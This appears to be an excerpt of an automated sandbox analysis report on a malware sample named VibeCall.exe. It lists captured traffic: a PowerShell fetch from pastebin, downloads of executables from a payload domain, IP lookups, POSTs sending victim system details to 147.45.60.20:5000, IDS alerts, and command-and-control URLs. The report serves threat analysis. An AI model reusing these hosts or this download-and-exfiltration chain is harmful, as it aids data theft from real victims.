                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:51 GMTContent-Type: application/octet-streamContent-Length: 16403908Connection: keep-aliveLast-Modified: Fri, 28 Feb 2025 15:05:18 GMTETag: "67c1d0ae-fa4dc4"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRVQWu98IO5RW3wNr5N%2Bwnk8MGzqXoz8y0SAiumBrR%2BiNYPFdTTtwLYJVSAk79Vi9s14ByCeJl%2F6PskOejb6lvwzzRi5w3L5i45XG%2B6PSJsjkxp0NRcvCqKYwZRgkGDB%2F3YQAkEaLw4Gwms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d374ffc3566e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=89&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 58 32 cc 02 39 5c 9f 02 39 5c 9f 02 39 5c 9f 70 b8 5f 9e 1e 39 5c 9f 70 b8 59 9e ae 39 5c 9f 70 b8 58 9e 1b 39 5c 9f 13 bf 5f 9e 14 39 5c 9f 13 bf 58 9e 13 39 5c 9f 13 bf 59 9e 50 39 5c 9f 70 b8 5d 9e 01 39 5c 9f 02 39 5d 9f 7e 39 5c 9f 86 bf 59 9e 01 39 5c 9f 86 bf 5e 9e 03 39 5c 9f 52 69 63 68 02 39 5c 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6f 5b be 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 58 02 00 00 d6 57 00 00 00 00 00 b6 72 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FX29\9\9\p_9\pY9\pX9\_9\X9\YP9\p]9\9]~9\Y9\^9\Rich9\PELo[g*XWrp@
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:57 GMTContent-Type: application/octet-streamContent-Length: 17066346Connection: keep-aliveLast-Modified: Fri, 28 Feb 2025 15:41:38 GMTETag: "67c1d932-104696a"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twbXvUDyyc8uMaNB449P2cl7sNyPO2SXoUwz0BmzAei2eOVpa2R2URdAKlQq1xYwO1shCrLr2QWzW6p1DNe3Lfhu8gF83RtJqg6bJGO7K8DN6PH9Lhtl%2BWsQ34FfjrM23l7SjkQZhDIhZoA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d39bd8acc32d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 46 52 00 00 00 00 00 f0 89 00 00 00 10 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 31 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 32 30 33 36 36 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 36 42 55 4e 32 55 47 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 32 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 32 30 33 36 36 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 36 42 55 4e 32 55 47 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 208.95.112.1:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 104.20.4.235:443
                      Source: global trafficHTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Content-Length: 38Content-Type: application/dns-message
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056EB654 WSARecv,WSAGetLastError,31_2_056EB654
                      Source: global trafficHTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: rustaisolutionnorisk.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: api.mirrow1-dell.xyz
                      Source: unknownDoH DNS queries detected: name: api.mirrow1-dell.xyz
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Content-Length: 38Content-Type: application/dns-message
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://aia.entrust.net/ts2-chain256.p7c01
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.entrust.net/csbr1.crl0
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.entrust.net/evcs2.crl0
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.entrust.net/g2ca.crl0
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.entrust.net/ts2ca.crl0
                      Source: VibeCall.exe, 00000000.00000003.1707821796.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708022699.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708450882.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708102002.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1707649515.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1707378859.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708266060.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000002.00000002.1866786065.0000024D1F0D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C4A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.entrust.net00
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.entrust.net01
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.entrust.net02
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F6A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: VibeCall.exe, 00000000.00000003.1721387410.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: VibeCall.exe, 00000000.00000003.1740281898.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1741281482.000001CCB0BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html-
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.entrust.net/rpa0
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.entrust.net/rpa03
                      Source: VibeCall.exe, 00000000.00000003.1741539213.000001CCB0BA3000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1741281482.000001CCB0BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VibeCall.exe, 00000000.00000003.1705357700.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VibeCall.exe, 00000000.00000003.1705357700.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comf
                      Source: VibeCall.exe, 00000000.00000003.1720377801.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com)
                      Source: VibeCall.exe, 00000000.00000003.1720303621.000001CCB0BD8000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720350423.000001CCB0BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com6
                      Source: VibeCall.exe, 00000000.00000003.1720800530.000001CCB0BB7000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720657232.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720528563.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comddH
                      Source: fontdrvhost.exe, fontdrvhost.exe, 00000025.00000002.2598003533.0000025F79D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: fontdrvhost.exe, 00000025.00000002.2598003533.0000025F79D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rmkernelbasentdllkernel32GetProcessMi
                      Source: fontdrvhost.exeString found in binary or memory: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
